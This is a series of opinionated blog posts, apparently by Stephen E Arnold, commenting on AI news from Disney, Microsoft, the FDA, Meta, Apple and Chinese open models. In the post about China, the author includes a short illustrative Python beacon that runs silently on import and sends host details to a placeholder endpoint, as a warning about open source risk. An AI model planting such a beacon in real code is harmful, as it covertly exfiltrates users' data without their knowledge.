Another Twist: AI Puts Mickey Mouse in a Trap
August 5, 2025
No AI. Just a dinobaby being a dinobaby.
The in-the-news Wall Street Journal reveals that Walt Disney and Mickey Mouse may have their tails in a modernized, painful artificial intelligence trap. “Is It Still Disney Magic If It’s AI?” asks an obvious question. My knee-jerk reaction after reading the article was, “Nope.”
The write up reports:
A deepfake Dwayne Johnson is just one part of a broader technological earthquake hitting Hollywood. Studios are scrambling to figure out simultaneously how to use AI in the filmmaking process and how to protect themselves against it. While executives see a future where the technology shaves tens of millions of dollars off a movie’s budget, they are grappling with a present filled with legal uncertainty, fan backlash and a wariness toward embracing tools that some in Silicon Valley view as their next-century replacement.
A deepfake Dwayne is a short step from a deepfake of the entire Disney menagerie. Imagine what happens if a bad actor puts Snow White in some compromising situations, posts the video on a torrent, and publicizes the service on a Telegram-type communications system. That could be interesting. Imagine Goofy at the YMCA with synthetic Village People.
How does Disney manage? The write up says:
Some Epic [a Disney “partner”] executives have complained about the slow pace of the decision-making at Disney, with signoffs needed from so many different divisions, said people familiar with the situation.
Slow worked before AI felt the whips of the funders who want payoffs. Now speed thrills. Dopey and Sleepy are not likely to make substantive contributions to Disney’s AI efforts. Has the magic been revealed or just appropriated by AI developers?
Here’s another question that might befuddle Immanuel Kant:
Some Disney executives have raised concerns ahead of the project’s launch, anticipated for fall 2026 at the earliest, about who owns fan creations based on Disney characters, said one of the people. For example, if a Fortnite gamer creates a Darth Vader and Spider-Man dance that goes viral on YouTube, who owns that dance?
From my tiny office in rural Kentucky, it looks like Disney is behind the eight ball. Like Apple and Telegram, the company faces smart software that presents a manageable problem for 23-year-old programmers. For those older, AI is disjunctive. Right, Dopey? Prince AI is busy elsewhere.
Stephen E Arnold, August 5, 2025
China Smart, US Dumb: Is There Any Doubt?
August 1, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I have been identifying some of the “China smart, US dumb” information that I see. I noticed a write up from The Register titled “China Proves That Open Models Are More Effective Than All the GPUs in the World.” My Google-style Red Alert buzzer buzzed and the bubble gum machine lights flashed.
There it was. The “all.” A categorical affirmative. China is doing something that is more effective than “all the GPUs in the world.” Not only that, “open models are more effective” too. I have to hit the off button.
The point of the write up for me is that OpenAI is a loser. I noted this statement:
OpenAI was supposed to make good on its name and release its first open-weights model since GPT-2 this week. Unfortunately, what could have been the US’s first half-decent open model of the year has been held up by a safety review…
But it is not just OpenAI muffing the bunny. The write up points out:
the best open model America has managed so far this year is Meta’s Llama 4, which enjoyed a less than stellar reception and was marred with controversy. Just this week, it was reported that Meta had apparently taken its two-trillion-parameter Behemoth out behind the barn after it failed to live up to expectations.
Do you want to say, “Losers”? Go ahead.
But what outfit is pushing out innovative smart software as open source? Okay, you can shout, “China. The Middle Kingdom. The rightful rulers of the Pacific Rim and Southeast Asia.”
That’s the “right” answer if you accept the “all” type of reasoning in the write up.
China has tallied a number of open source wins; specifically, Deepseek, Qwen, M1, Ernie, and the big winner Kimi.
Do you still have doubts about China’s AI prowess? Something is definitely wrong with you, pilgrim.
Several observations:
- The write up is a very good example of the China smart, US dumb messaging that has made its way from the South China Morning Post to YouTube and now to The Register. One has to say, “Good work to the Chinese strategists.”
- The push for open source is interesting. I am not 100 percent convinced that making these models available is intended to benefit non-Middle Kingdom people. I think that the push, like the shift to cryptocurrency in non-traditional finance, is part of an effort to undermine what might be called “America’s hegemony.”
- The overt criticism of OpenAI and Meta (Facebook) illustrates a growing confidence in China that Western European information channels can be exploited.
Does this matter? I think it does. Open source software has some issues. These include its use as a vector for malware. Developers often abandon projects, leaving users high and dry, with some reaching for their wallets to buy commercial solutions. Open source projects for smart software may have baked-in biases and functions that are not easily spotted. Many people are aware of NSO Group’s ability to penetrate communications on a device-by-device basis. What happens if a phone-home ability is baked into some open source software?
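As a minimal sketch of why this worries me, consider how little code a phone-home beacon needs. The example below is entirely my own illustration, not taken from any real project, and the collection URL is hypothetical:

```python
# A deliberately simple, hypothetical sketch of a "phone home" beacon
# hiding inside an innocuous open source module: a few lines that run
# on import and ship basic host data to a remote endpoint.
import json
import platform
import urllib.request

def _beacon() -> None:
    payload = json.dumps({
        "host_os": platform.system(),
        "python": platform.python_version(),
    }).encode("utf-8")
    req = urllib.request.Request(
        "https://example.com/collect",   # hypothetical collection endpoint
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    try:
        urllib.request.urlopen(req, timeout=2)  # fire and forget
    except OSError:
        pass  # fail silently so the host application never notices

_beacon()  # executes as a side effect the moment the module is imported
```

A few lines like these buried in a transitive dependency would run on every import, and most users would never look.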
Remember that “all.” The logical fallacy illustrates that some additional thinking may be necessary when it comes to embedding and using software from some countries with very big ambitions. What is China proving? Could it be China smart, US dumb?
Stephen E Arnold, August 1, 2025
Microsoft and Job Loss Categories: AI Replaces Humans for Sure
July 31, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I read “Working with AI: Measuring the Occupational Implications of Generative AI.” This is quite a sporty academic-type write up. The people cranking out this 41-page Sociology 305 term paper work at Microsoft (for now).
The main point of the 41-page research summary is:
Lots of people will lose their jobs to AI.
Now this might be a surprise to many people, but I think the consensus among bean counters is that humans cost too much and require too much valuable senior manager time to manage correctly. Load up the AI, train the software, and create some workflows. Good enough and the cost savings are obvious even to those who failed their CPA examination.
The paper is chock full of jargon, explanations of the methodology which makes the project so darned important, and a wonky approach to presenting the findings.
Remember:
Lots of people will lose their jobs to AI.
The highlight of the paper in my opinion is the “list” of occupations likely to find that AI displaces humans at a healthy pace. The list is on page 12 of the report. I snapped an image of this chart “Top 40 Occupations with Highest AI Applicability Score.” The jargon means:
Lots of people will lose their jobs to AI.
Here’s the chart. (Yes, I know you cannot read it. Just navigate to the original document and read the list. I am not retyping 40 job categories. Also, I am not going to explain the MSFT “mean action score.” You can look at that capstone to academic wizardry yourself.)
What are the top 10 jobs likely to result in big time job losses? Microsoft says they are:
- People who translate from one language to another
- Historians, which I think means “history teachers” and writers of non-fiction books about the past
- Passenger attendants (think robots who bring you a for-fee vanilla cookie and an over-priced Coke with “real cane sugar”)
- People who sell services (yikes, that’s every consulting firm in the world. MBAs, be afraid)
- Writers (this category appears a number of times in the list of 40, but the “mean action score” knows best)
- Customer support people (companies want customers to never call. AI is the way to achieve this goal)
- CNC tool programmers (really? Someone has to write the code for the nifty Chip Foose wheel once, I think. After that, who needs the programmer?)
- Telephone operators (there are still telephone operators. Maybe the “mean action score” system means receptionists at the urology doctors’ office?)
- Ticket agents (No big surprise)
- Broadcast announcers (no more Don Wilsons or Ken Carpenters. Sad.)
The remaining 30 are equally eclectic and repetitive. I think you get the idea. Service jobs and repetitive work: dinosaurs waiting to die.
Microsoft knows how to brighten the day for recent college graduates, people under 35, and those who are unemployed.
Oh, well, there is the Copilot system to speed information access about job hunting and how to keep a positive attitude. Thanks, Microsoft.
Stephen E Arnold, July 31, 2025
No Big Deal. It Is Just Life or Death. Meh.
July 31, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I am not sure information from old-fashioned television channels is rock solid, but today what information is? I read “FDA’s Artificial Intelligence Is Supposed to Revolutionize Drug Approvals. It’s Making Up Nonexistent Studies.” Heads up. You may have to pay to read the full write up.
The main idea in the report struck me as:
[Elsa, an AI system deployed by the US Food and Drug Administration] has also made up nonexistent studies, known as AI “hallucinating,” or misrepresented research, according to three current FDA employees and documents seen by CNN. This makes it unreliable for their most critical work, the employees said.
To be fair, some researchers make up data and fiddle with “real” images for some peer-reviewed research papers. It makes sense that smart software trained on “publicly available” data would possibly learn that making up information is standard operating procedure.
The cited article does not provide the names and backgrounds of the individuals who provided the information about this smart software. That’s not unusual today.
I did note this anonymous quote:
“Anything that you don’t have time to double-check is unreliable. It hallucinates confidently,” said one employee — a far cry from what has been publicly promised. “AI is supposed to save our time, but I guarantee you that I waste a lot of extra time just due to the heightened vigilance that I have to have” to check for fake or misrepresented studies, a second FDA employee said.
Is this a major problem? Many smart people are working to make AI the next big thing. I have confidence that prudence, accuracy, public safety, and AI user well-being are priorities. Yep, that’s my assumption.
I wish to offer several observations:
- Smart software may need some fine tuning before it becomes the arbiter of certain types of medical treatments, procedures, and compounds.
- AI is definitely free from the annoying hassles of sick leave, health care, and recalcitrance that human employees evidence. Therefore, AI has major benefits by definition.
- Hallucinations are a matter of opinion; for example, humans are creative. Hallucinating software may be demonstrating creativity. Creativity is a net positive; therefore, why worry?
The cited news report stated:
Those who have used it say they have noticed serious problems. For example, it cannot reliably represent studies.
As I said, “Why worry?” Humans make drug errors as well. Example: immunomodulatory drugs like thalidomide. AI may be able to repurpose some drugs. Net gain. Why worry?
Stephen E Arnold, July 31, 2025
SEO Plus AI: Putting a Stake in the Frail Heart of Relevance
July 30, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I have not been too impressed with the search engine optimization service sector. My personal view is that relevance has been undermined. Gamesmanship, outright trickery, and fabrication have replaced content based on verifiable facts, data, and old-fashioned ethical and moral precepts.
Who needs that baloney? Not the SEO sector. The idea is to take content and slam it in the face of a user who may be looking for information relevant to a question, problem, or issue.
I read “Altezza Introduces Service as Software Platform for AI-Powered Search Optimization.” The name Altezza reminded me of a product called Bartesian. This outfit sells a machine that automatically makes alcohol-based drinks. Alcohol, some researchers suggest, is a bit of a problem for humanoids. Altezza may be doing to relevance what three watermelon margaritas do to a college student’s mental functions.
The article about Altezza says:
Altezza’s platform turns essential SEO tasks into scalable services that enterprise eCommerce brands can access without the burden of manual implementation.
Great AI-generated content pushed into a software script and “published” in a variety of ways in different channels. Altezza’s secret sauce may be revealed in this statement:
While conventional tools provide access to data and features, they leave implementation to overwhelmed internal teams.
Yep, let those young content marketers punch the buttons on a Bartesian device and scroll TikTok-type content. Altezza does the hard work: SEO based on AI and automated distribution and publishing.
Altezza is no spring chicken. The company was founded in 1998 and “combines cutting-edge AI technology with deep search expertise to help brands achieve sustainable organic growth.”
Yep, another relevance-destroying, drone-based smart system is available.
Stephen E Arnold, July 30, 2025
AI: Pirate or Robin Hood?
July 30, 2025
One of the most notorious things about the Internet is the pirating of creative properties. The biggest victim is the movie industry, followed closely by publishing. Creative works that people spend endless hours making are freely distributed without proper payment to the creators and related staff. It sounds like a Robin Hood scenario, but creative folks are the ones suffering. Best-selling author David Baldacci ripped into Big Tech for training their AI on stolen creative properties, and he demanded that the federal government step in to rein them in.
LSE says that only a small number of AI developers support using free and pirated data for training models: “Most AI Researchers Reject Free Use Of Public Data To Train AI Models.” Data from UCL shows AI developers want there to be ethical standards for training data, and many are in favor of asking permission from content creators. The current UK government places the responsibility on content creators to “opt out” of their work being used for AI models. Anyone with a brain knows that the AI developers skirt around those regulations.
When LSE polled people about who should protect content creators and regulate AI, opinions were split among the usual suspects: tech companies, governments, independent people, and international standards bodies.
Let’s see what creative genius Paul McCartney said:
While there are gaps between researchers’ views and the views of authors, it would be a mistake to see these only as gaps in understanding. Songwriter and surviving Beatle Paul McCartney’s comments to the BBC are a case in point: “I think AI is great, and it can do lots of great things,” McCartney told Laura Kuensberg, but it shouldn’t rip creative people off. It’s clear that McCartney gets the opportunities AI offers. For instance, he used AI to help bring to life the voice of former bandmate John Lennon in a recent single. But like the writers protesting outside of Meta’s office, he has a clear take on what AI is doing wrong and who should be responsible. These views and the views of other members of the public should be taken seriously, rather than viewed as misconceptions that will improve with education or the further development of technologies.
Authors want protection. Publishers want money. AI companies want to do exactly what they want. This is a three-intellectual-body problem with no easy solution.
Whitney Grace, July 30, 2025
An Author Who Will Not Be Hired by an AI Outfit. Period.
July 29, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
I read an article / essay titled (in English) “The Bewildering Phenomenon of Declining Quality.” I found the examples in the article interesting. A couple, like the poke at “fast fashion,” have become tropes. Others, like the comments about customer service today, were insightful. Here’s an example of a comment I noted:
José Francisco Rodríguez, president of the Spanish Association of Customer Relations Experts, admits that a lack of digital skills can be particularly frustrating for older adults, who perceive that the quality of customer service has deteriorated due to automation. However, Rodríguez argues that, generally speaking, automation does improve customer service. Furthermore, he strongly rejects the idea that companies are seeking to cut costs with this technology: “Artificial intelligence does not save money or personnel,” he states. “The initial investment in technology is extremely high, and the benefits remain practically the same. We have not detected any job losses in the sector either.”
I know that the motivation for dumping humans in customer support comes from [a] the extra work required to manage humans, [b] the escalating costs of health care and other “benefits,” and [c] the black hole of costs that burn cash because customers want help, returns, and special treatment. Software robots are the answer.
The write up’s comments about smart software are also interesting. Here’s an example of a passage I circled:
A 2020 analysis by Fakespot of 720 million Amazon reviews revealed that approximately 42% were unreliable or fake. This means that almost half of the reviews we consult before purchasing a product online may have been generated by robots, whose purpose is to either encourage or discourage purchases, depending on who programmed them. Artificial intelligence itself could deteriorate if no action is taken. In 2024, bot activity accounted for almost half of internet traffic. This poses a serious problem: language models are trained with data pulled from the web. When these models begin to be fed with information they themselves have generated, it leads to a so-called “model collapse.”
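The collapse dynamic is easy to demonstrate in miniature. Here is a toy sketch of my own (not from the cited article, and vastly simpler than LLM training): fit a Gaussian to data, sample new “training data” from the fit, refit, and repeat. With a finite sample each generation, the learned distribution drifts and narrows:

```python
import numpy as np

rng = np.random.default_rng(42)

n_samples = 50     # training set size per generation
generations = 200  # rounds of retraining on the model's own output

# "Human" data: a standard normal distribution.
data = rng.normal(loc=0.0, scale=1.0, size=n_samples)

for g in range(generations):
    mu, sigma = data.mean(), data.std()      # "train" the model (Gaussian MLE fit)
    data = rng.normal(mu, sigma, n_samples)  # next generation trains on model output
    if g % 25 == 0:
        print(f"generation {g:3d}: mean={mu:+.3f}, std={sigma:.3f}")

# Typical run: the standard deviation drifts steadily downward, so the
# "model" progressively forgets the variety in the original data.
```

Real model training is far more complicated, but the feedback loop has the same shape: each generation sees only what the previous generation produced.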
What surprised me is the nature of the problem, specifically:
a truly good product contributes something useful to society. It’s linked to ethics, effort, and commitment.
One question: How does one inculcate these words into societal behavior?
One possible answer: Skynet.
Stephen E Arnold, July 29, 2025
AI, Math, and Cognitive Dissonance
July 28, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
AI marketers will have to spend some time positioning their smart software as great tools for solving mathematical problems. “Not Even Bronze: Evaluating LLMs on 2025 International Math Olympiad” reports that words about prowess are disconnected from performance. The write up says:
The best-performing model is Gemini 2.5 Pro, achieving a score of 31% (13 points), which is well below the 19/42 score necessary for a bronze medal. Other models lagged significantly behind, with Grok-4 and Deepseek-R1 in particular underperforming relative to their earlier results on other MathArena benchmarks.
The write up points out, possibly to call attention to the slight disconnect between the marketing of Google AI and its performance in this contest:
As mentioned above, Gemini 2.5 Pro achieved the highest score with an average of 31% (13 points). While this may seem low, especially considering the $400 spent on generating just 24 answers, it nonetheless represents a strong performance given the extreme difficulty of the IMO. However, these 13 points are not enough for a bronze medal (19/42). In contrast, other models trail significantly behind and we can already safely say that none of them will achieve the bronze medal. Full results are available on our leaderboard, where everyone can explore and analyze individual responses and judge feedback in detail.
The fact that this is just one “competition,” combined with the lousy performance of the high-profile models and the complex process required to assess performance, makes this result easy to ignore.
Let’s just assume that it is close enough for horse shoes and good enough. With that assumption in mind, do you want smart software making decisions about what information you can access, the medical prognosis for your nine-year-old child, or decisions about your driver’s license renewal?
Now, let’s consider this write up fragmented across Tweets: [Thread] An OpenAI researcher says the company’s latest experimental reasoning LLM achieved gold medal-level performance on the 2025 International Math Olympiad. The little posts are perfect for a person familiar with TikTok-type and Twitter-like content. Not me. The main idea is that in the same competition, OpenAI earned “gold medal-level performance.”
The $64 question is, “Who is correct?” The answer is, “It depends.”
Is this an example of what I learned in 1962 in my freshman year at a so-so university? I think the term was cognitive dissonance.
Stephen E Arnold, July 28, 2025
Silicon Valley: The New Home of Unsportsmanlike Conduct
July 26, 2025
Sorry, no smart software involved. A dinobaby’s own emergent thoughts.
I read the Axios run down of Mark Zuckerberg’s hiring blitz. “Mark Zuckerberg Details Meta’s Superintelligence Plans” reports:
The company [Mark Zuckerberg’s very own Meta] is spending billions of dollars to hire key employees as it looks to jumpstart its effort and compete with Google, OpenAI and others.
Meta (formerly the estimable juicy brand Facebook) had some smart software people. (Does anyone remember Jerome Pesenti?) Then there was Llama, which, like the guanaco tamed and used to carry tourists to Peruvian sights, has been reduced to a photo op for parents wanting to document their kids’ visit to Cusco.
Is Mr. Zuckerberg creating a mini Bell Labs in order to take the lead in smart software? The Axios write up contains some names of people who may have some connection to the Middle Kingdom. The idea is to get smart people, put them in a two-story building in Silicon Valley, turn up the A/C, and inject snacks.
I interpret the hiring and the allegedly massive pay packets as a simpler, more direct idea: Move fast, break things.
What are the things Mr. Zuckerberg is breaking?
First, I worked in Silicon Valley (aka Plastic Fantastic) for a number of years. I lived in Berkeley and loved that commute to San Mateo, Foster City, and environs. Poaching employees was done in a more relaxed way. A chat at a conference, a small gathering after a softball game at the public fields not far from Stanford (yes, the school which had a president who made up information), or at some event like a talk at the Computer Museum or whatever it was called. That’s history. Mr. Zuckerberg shows up (virtually or in a T shirt), offers an alleged $100 million, and hires a big name. No muss. No fuss. No social conventions. Just money. Cash. (I almost wish I were 25 and working in Mountain View. Sigh.)
Second, Mr. Zuckerberg is targeting the sensitive private parts of big leadership people. No dancing. Just targeted castration of key talent. Ouch. The Axios write up provides the names of some of these individuals. What is interesting is that these people come from the knowledge centers hidden from the journalistic spotlight. Those suffering life-changing removals without anesthesia include Google, OpenAI, and similar firms. In the good old days, Silicon Valley firms competed with less of that Manhattan Lower East Side vibe. No more.
Third, Mr. Zuckerberg is not announcing anything at conferences or with friendly emails. He is just taking action. Let the people at Apple, Safe Superintelligence, and similar outfits read the news in a resignation email. Mr. Zuckerberg knows that those NDAs and employment contracts can be used to wipe away tears when the loss of a valuable person is discovered.
What’s up?
Obviously Mr. Zuckerberg is not happy that his outfit is perceived as a loser in the AI game. Will this Bell Labs West approach work? Probably not. It will deliver one thing, however. Mr. Zuckerberg is sending a message that he will spend money to cripple, hobble, and derail AI innovation at the firms beating his firm’s LLM to death.
Move fast and break things has come to the folks who used the approach to take out swaths of established businesses. Now the technique is being used on companies next door. Welcome to the ungentrified neighborhood. Oh, expect more fist fights at those once friendly, co-ed softball games.
Stephen E Arnold, July 26, 2025
Will Apple Do AI in China? Subsidies, Investment, Saluting Too
July 25, 2025
This blog post is the work of an authentic dinobaby. Sorry. No smart software can help this reptilian thinker.
Apple long ago vowed to use the latest tech to design its hardware. Now that means generative AI. Asia Financial reports, “Apple Keen to Use AI to Design Its Chips, Tech Executive Says.” That tidbit comes from a speech Apple VP Johny Srouji made as he accepted an award from tech R&D group Imec. We learn:
“In the speech, a recording of which was reviewed by Reuters, Srouji outlined Apple’s development of custom chips from the first A4 chip in an iPhone in 2010 to the most recent chips that power Mac desktop computers and the Vision Pro headset. He said one of the key lessons Apple learned was that it needed to use the most cutting-edge tools available to design its chips, including the latest chip design software from electronic design automation (EDA) firms. The two biggest players in that industry – Cadence Design Systems and Synopsys – have been racing to add artificial intelligence to their offerings. ‘EDA companies are super critical in supporting our chip design complexities,’ Srouji said in his remarks. ‘Generative AI techniques have a high potential in getting more design work in less time, and it can be a huge productivity boost.’”
Srouji also noted Apple is one to commit to its choices. The post notes:
“Srouji said another key lesson Apple learned in designing its own chips was to make big bets and not look back. When Apple transitioned its Mac computers – its oldest active product line – from Intel chips to its own chips in 2020, it made no contingency plans in case the switch did not work.”
Yes, that gamble paid off for the polished tech giant. Will this bet be equally advantageous?
Has Apple read “Apple in China”?
Cynthia Murrell, July 25, 2025